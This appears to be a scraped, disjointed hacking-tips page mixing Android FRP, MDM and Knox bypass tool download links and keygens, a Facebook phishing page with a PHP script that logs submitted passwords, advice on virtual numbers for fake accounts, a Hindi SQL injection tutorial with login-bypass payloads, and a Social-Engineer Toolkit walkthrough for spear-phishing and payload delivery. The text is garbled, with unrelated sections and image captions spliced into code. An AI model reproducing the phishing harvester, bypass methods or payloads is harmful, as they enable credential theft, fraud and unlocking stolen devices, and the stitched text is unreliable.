EDL/BROM
[ADD] Samsung Galaxy A20S(All Bit)
[EDL] ERASE FRP
FUNCTION
[ADB] SAMSUNG MDM BYPASS 1
[ADB] SAMSUNG MDM BYPASS 2
[ADB] Disabling KG
[ADB] Disabling Knox
TOOL LINK - https://www.mediafire.com/file/z50hu3zzy80mmmz/TFTUnlock-2024-v6.1.1.1.zip/file
XiaoMiFlash 2024.08.1.0 Modified
SPD frp tool tecno infinix realme
SUPORT MODEL LIST
**Infinix:**
- Infinix Hot 10i
- Infinix Hot 12 Play
- Infinix Hot 12 Play NFC
- Infinix Smart 6A
- Infinix Smart 6B
**Realme:**
- Realme C11
- Realme C21Y
- Realme C25
- Realme C25
- Realme C30
- Realme C35
- Realme Narzo 50A Prime
**Techno:**
- Techno Pop 4
- Techno Pop 5
- Techno Pop 5B
- Techno Pop 5 Go BD1
- Techno Pop 5 LTE BD4
- Techno Pova Neo LE6H
- Techno Spark 7 PR651
- Techno Spark 7 PR651E
- Techno Spark 7 PR651H
- Techno Spark 8C
TOOL LINK - https://www.mediafire.com/file/64kfl8rmw4tmls0/PL._SPD_FRP_Tools.rar/file
TPS Tool (100% Offline) – Version 3.0.230261 FREE Keygen Added
suport model
Realme
***************
C11 [2021] (RMX3231)
C21Y (RMX3261)
C21Y (RMX3263)
C25Y (RMX3265)
C25Y (RMX3269)
C31 (RMX3501)
C35 (RMX3511)
Narzo 50A Prime (RMX3516)
Tecno
***************
Pop 4 (BC2C)
Pop 5 Go (BD1)
Pop 5 (BD2)
Pop 5 (BD2P)
Pova Neo (LE6H)
Spark 7 (PR651)
Spark 7 (PR651E)
Spark 7 (PR651H)
Spark 8C (Kg5k)
Gionee
***************
Gionee F10
Gionee Max
Infinix
***************
Hot 10i (PR652B)
Hot 12 Play (X6816C)
Hot 12 Pro (X668)
Smart 5 Pro
Smart 6 (X6511)
Smart 6 (X6511B)
iTel
***************
A17 (W5006X)
A23
A23 Pro (L5006C)
A25 (L5002)
A25 Pro (L5002P)
A26 (A571L)
A27 (A551L)
A33 (W5001P)
A33 Plus (A509W)
A46 (L5503)
A48 (L6006)
A49 (A661L)
A55 (W6003)
A56 (W6004)
A56 Pro (W6004P)
A57 (A611W)
A57 (A611WP)
Vision 1 (L6005)
Vision 1 Plus (L6501)
Vision 2 (L6503)
Vision 2S (P651L)
Vision 3 Plus (P682LP)
Create Facebook Phishing Page:
Steps to Create Facebook Phishing Page:
File name: xyz.php
<?php // Set the location to redirect the page // Open the text file in writing mode $file = fopen("log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($file, $variable); fwrite($file, "="); fwrite($file, $value); fwrite($file, "\r\n");} fwrite($file, "\r\n");fclose($file);exit;?> |
Now you are done, share the page and if anyone will enter username and password then it will save into the log.txt file.
Virtual Numbers can be used to verify multiple accounts
like gmail, facebook, instagram, whatsapp etc etc
( Make sure to make fake accounts only as these numbers are accessed by many users )
Websites which offer Virtual Number?
Free Link Virtual Number
https://voice.google.com/u/0/signup
https://receive-sms-online.info/
Paid Numbers ( Paid Solution, Rs 20-30 rs per otp )
Use multiple accounts like gmail, facebook, instagram, whatsapp etc etc
Bug Bounty Program
.jpeg)
Hindi => Ye below website pr list h sabh companies ki, jo abhi offer derhi h ki aap unki website hack kro or kmiya find kro unki app main and vo apko paise degi iske badle
English => Open below website and you will find list of all companies offering Bug Bounty Program
Explanation of these topics? How to perform these attacks?
SQL इंजेक्शन (SQLi) एक प्रकार का इंजेक्शन हमला है जो दुर्भावनापूर्ण SQL कथनों को निष्पादित करना संभव बनाता है। ये कथन वेब एप्लिकेशन के पीछे डेटाबेस सर्वर को नियंत्रित करते हैं। एप्लिकेशन सुरक्षा उपायों को बायपास करने के लिए हमलावर SQL इंजेक्शन कमजोरियों का उपयोग कर सकते हैं। वे किसी वेब पेज या वेब एप्लिकेशन के प्रमाणीकरण और प्राधिकरण के आसपास जा सकते हैं और संपूर्ण SQL डेटाबेस की सामग्री को पुनः प्राप्त कर सकते हैं। वे डेटाबेस में रिकॉर्ड जोड़ने, संशोधित करने और हटाने के लिए SQL इंजेक्शन का भी उपयोग कर सकते हैं।
SQL इंजेक्शन भेद्यता किसी भी वेबसाइट या वेब एप्लिकेशन को प्रभावित कर सकती है जो MySQL, Oracle, SQL सर्वर या अन्य जैसे SQL डेटाबेस का उपयोग करती है। अपराधी इसका उपयोग आपके संवेदनशील डेटा तक अनधिकृत पहुंच प्राप्त करने के लिए कर सकते हैं: ग्राहक जानकारी, व्यक्तिगत डेटा, व्यापार रहस्य, बौद्धिक संपदा, और बहुत कुछ। SQL इंजेक्शन हमले सबसे पुराने, सबसे प्रचलित और सबसे खतरनाक वेब एप्लिकेशन कमजोरियों में से एक हैं।
SQL इंजेक्शन हमला करने के लिए, एक हमलावर को पहले वेब पेज या वेब एप्लिकेशन के भीतर कमजोर उपयोगकर्ता इनपुट ढूंढना होगा। एक वेब पेज या वेब एप्लिकेशन जिसमें SQL इंजेक्शन भेद्यता होती है, ऐसे उपयोगकर्ता इनपुट को सीधे SQL क्वेरी में उपयोग करता है। हमलावर इनपुट सामग्री बना सकता है. ऐसी सामग्री को अक्सर दुर्भावनापूर्ण पेलोड कहा जाता है और यह हमले का मुख्य हिस्सा है। हमलावर द्वारा यह सामग्री भेजने के बाद, डेटाबेस में दुर्भावनापूर्ण SQL कमांड निष्पादित किए जाते हैं।
SQL एक क्वेरी भाषा है जिसे रिलेशनल डेटाबेस में संग्रहीत डेटा को प्रबंधित करने के लिए डिज़ाइन किया गया था। आप इसका उपयोग डेटा तक पहुंचने, संशोधित करने और हटाने के लिए कर सकते हैं। कई वेब एप्लिकेशन और वेबसाइटें सारा डेटा SQL डेटाबेस में संग्रहीत करती हैं। कुछ मामलों में, आप ऑपरेटिंग सिस्टम कमांड चलाने के लिए SQL कमांड का भी उपयोग कर सकते हैं। इसलिए, एक सफल SQL इंजेक्शन हमले के बहुत गंभीर परिणाम हो सकते हैं।
SQL इंजेक्शन हमले कई प्रकार के होते हैं: इन-बैंड SQLi (डेटाबेस त्रुटियों या UNION कमांड का उपयोग करके), ब्लाइंड SQLi, और आउट-ऑफ़-बैंड SQLi। आप निम्नलिखित लेखों में उनके बारे में अधिक पढ़ सकते हैं: ब्लाइंड SQL इंजेक्शन: यह क्या है।
पहला उदाहरण बहुत सरल है. यह दिखाता है कि कैसे एक हमलावर एप्लिकेशन सुरक्षा से बचने और व्यवस्थापक के रूप में प्रमाणित करने के लिए SQL इंजेक्शन भेद्यता का उपयोग कर सकता है।
निम्नलिखित स्क्रिप्ट एक वेब सर्वर पर निष्पादित छद्मकोड है। यह उपयोगकर्ता नाम और पासवर्ड से प्रमाणित करने का एक सरल उदाहरण है। उदाहरण डेटाबेस में users निम्नलिखित कॉलमों के साथ नामित एक तालिका है: username और password।
![TFT Unlock Tool V6.2.1.1 - TFT UNLOCKER DIGITAL 2024 - New UnlockTool All Updates - Latest Version Android Solutions TFT Unlock Tools-2024-6.2.1.1 (Auto Update) Samsung FRP & MTK Meta Mode Featured Update TFT Unlock Tools-2024-6.2.1.1 TFT Unlock Tool Read Screen-Lock via ADB Old Android Models - v6.2.1.1 - G920F Samsung Galaxy S6 [New Feature] TFT Unlock Tools-2024-6.2.1.1 (Auto update) - Live](https://iaasteam.com/wp-content/uploads/2024/12/TFT-Unlock-Tools-2024-6.2.1.1-2-230x300.png)
# Define POST variables
uname = request.POST['username']
passwd = request.POST['password']
# SQL query vulnerable to SQLi
sql = “SELECT id FROM users WHERE username=’” + uname + “’ AND password=’” + passwd + “’”
# Execute the SQL statement
database.execute(sql)ये इनपुट फ़ील्ड SQL इंजेक्शन के प्रति संवेदनशील हैं। एक हमलावर इनपुट में SQL कमांड का उपयोग इस तरह से कर सकता है जो डेटाबेस सर्वर द्वारा निष्पादित SQL स्टेटमेंट को बदल देगा। उदाहरण के लिए, वे एक एकल उद्धरण वाली युक्ति का उपयोग कर सकते हैं और passwd फ़ील्ड को यहां सेट कर सकते हैं:
password' OR 1=1परिणामस्वरूप, डेटाबेस सर्वर निम्न SQL क्वेरी चलाता है:
SELECT id FROM users WHERE username='username' AND password='password' OR 1=1'कथन के कारण OR 1=1 , खंड तालिका से WHERE पहला लौटाता है, इससे कोई फर्क नहीं पड़ता कि और क्या हैं। डेटाबेस में पहला उपयोगकर्ता अक्सर प्रशासक होता है। इस तरह, हमलावर न केवल प्रमाणीकरण को दरकिनार कर देता है बल्कि प्रशासकीय विशेषाधिकार भी प्राप्त कर लेता है। वे SQL क्वेरी के निष्पादन को और अधिक नियंत्रित करने के लिए शेष SQL कथन पर भी टिप्पणी कर सकते हैं:idusersusernamepasswordid
-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite
' OR '1'='1' --
' OR '1'='1' /*
-- MySQL
' OR '1'='1' #
-- Access (using null characters)
' OR '1'='1' %00
' OR '1'='1' %16SQL इंजेक्शन के सबसे सामान्य प्रकारों में से एक UNION ऑपरेटर का उपयोग करता है। यह हमलावर को दो या दो से अधिक SELECT कथनों के परिणामों को एक ही परिणाम में संयोजित करने की अनुमति देता है। तकनीक को यूनियन -आधारित SQL इंजेक्शन कहा जाता है।
निम्नलिखित इस तकनीक का एक उदाहरण है. यह वेब पेज testphp.volnweb.com का उपयोग करता है , जो एक्यूनेटिक्स द्वारा होस्ट की गई एक जानबूझकर कमजोर वेबसाइट है।
निम्नलिखित HTTP अनुरोध एक सामान्य अनुरोध है जो एक वैध उपयोगकर्ता भेजेगा:
GET http://testphp.vulnweb.com/artists.php?artist=1 HTTP/1.1
Host: testphp.vulnweb.com
SQL इंजेक्शन हमलों को रोकने का एकमात्र निश्चित तरीका इनपुट सत्यापन और तैयार कथनों सहित पैरामीट्रिज्ड क्वेरीज़ हैं। एप्लिकेशन कोड को कभी भी सीधे इनपुट का उपयोग नहीं करना चाहिए। डेवलपर को सभी इनपुट को सैनिटाइज करना होगा, न कि केवल लॉगिन फॉर्म जैसे वेब फॉर्म इनपुट को। उन्हें सिंगल कोट्स जैसे संभावित दुर्भावनापूर्ण कोड तत्वों को हटाना होगा। अपनी उत्पादन साइटों पर डेटाबेस त्रुटियों की दृश्यता को बंद करना भी एक अच्छा विचार है। आपके डेटाबेस के बारे में जानकारी प्राप्त करने के लिए SQL इंजेक्शन के साथ डेटाबेस त्रुटियों का उपयोग किया जा सकता है।
यदि आपको SQL इंजेक्शन भेद्यता का पता चलता है, उदाहरण के लिए एक्यूनेटिक्स स्कैन का उपयोग करके, तो आप इसे तुरंत ठीक करने में असमर्थ हो सकते हैं। उदाहरण के लिए, भेद्यता ओपन सोर्स कोड में हो सकती है। ऐसे मामलों में, आप अपने इनपुट को अस्थायी रूप से साफ़ करने के लिए वेब एप्लिकेशन फ़ायरवॉल का उपयोग कर सकते हैं।
PHP भाषा में SQL इंजेक्शन हमलों को रोकने का तरीका जानने के लिए, देखें: PHP अनुप्रयोगों में SQL इंजेक्शन कमजोरियों को रोकना और उन्हें ठीक करना। यह जानने के लिए कि इसे कई अन्य विभिन्न प्रोग्रामिंग भाषाओं में कैसे किया जाए, SQL इंजेक्शन को रोकने के लिए बॉबी टेबल्स गाइड देखें।
trace -m to track your own ip address.
trace -t target-ip to track other’s ip address for example ip-tracer -t 127.0.0.1
trace for more information.
OR
ip-tracer -m to track your own ip address.
ip-tracer -t target-ip to track other’s ip address for example ip-tracer -t 127.0.0.1
ip-tracer for more information.
How to secure android Mobile
I’ve mentioned 4 apps, use those apps yourself and test it and do let me know what it does?
Install these 4 apps and do let me know how you can use these apps for Securing yourself
https://play.google.com/store/apps/details?id=app.greyshirts.firewall
https://play.google.com/store/apps/details?id=dev.ukanth.ufirewall
https://play.google.com/store/apps/details?id=eu.faircode.netguard
https://play.google.com/store/apps/details?id=co.netpatch.firewall
Note:-
agar play stor pr koi app nahi milta hai to browser se download kre.
Spear Fake Page Attack
The Social-Engineer Toolkit (SET) is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of time. These kind of tools use human behaviors to trick them to the attack vectors.
Let’s learn how to use the Social Engineer Toolkit.
Step 1: − To open SET, go to Applications → Social Engineering Tools → Click “SET” Social Engineering Tool.
Step 2: − It will ask if you agree with the terms of usage. Type “y” as shown in the following screenshot.
Step 3 :− Most of the menus shown in the following screenshot are self-explained and among them the most important is the number 1 “Social Engineering Attacks”.
Step 4: − Type “1” → Enter. A submenu will open. If you press the Enter button again, you will see the explanations for each submenu.
The Spear-phishing module allows you to specially craft email messages and send them to your targeted victims with attached FileFormatmalicious payloads. For example, sending malicious PDF document which if the victim opens, it will compromise the system. If you want to spoof your email address, be sure “Sendmail” is installed (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.
There are two options for the spear phishing attack :−
The first one is letting SET do everything for you (option 1), the second one is to create your own FileFormat payload and use it in your own attack.
Type “99” to go back to the main menu and then type “2” to go to “The web attack vectors”.
The web attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim. This module is used by performing phishing attacks against the victim if they click the link. There is a wide variety of attacks that can occur once they click a link.
Type “99” to return to the main menu and then type “3”.
The infectious USB/CD/DVD module will create an autorun.inf file and a Metasploit payload. The payload and autorun file is burned or copied on a USB. When DVD/USB/CD is inserted in the victim’s machine, it will trigger an autorun feature (if autorun is enabled) and hopefully compromise the system. You can pick the attack vector you wish to use: fileformat bugs or a straight executable.
Following are the options for Infectious Media Generator.
Type “99” to go back to the main menu. Then, type “4” to go to “The web attack vectors”.
The create payload and listener is a simple way to create a Metasploit payload. It will export the exe file for you and generate a listener. You would need to convince the victim to download the exe file and execute it to get the shell.
Type “99” to go back to the main menu and then type “5” to go to “The web attack vectors”.
The mass mailer attack will allow you to send multiple emails to victims and customize the messages. There are two options on the mass e-mailer; the first is to send an email to a single email address. The second option allows you to import a list that has all recipient emails and it will send your message to as many people as you want within that list.
Type “99” to go back to the main menu and then type “9” to go to “Powershell Attack Vector”.
The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks allow you to use PowerShell, which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventive technologies.
Increase Followers
Increase your Instagram Followers
TEST =>
Increase your Instagram Followers
Hint? =>
Popular
|
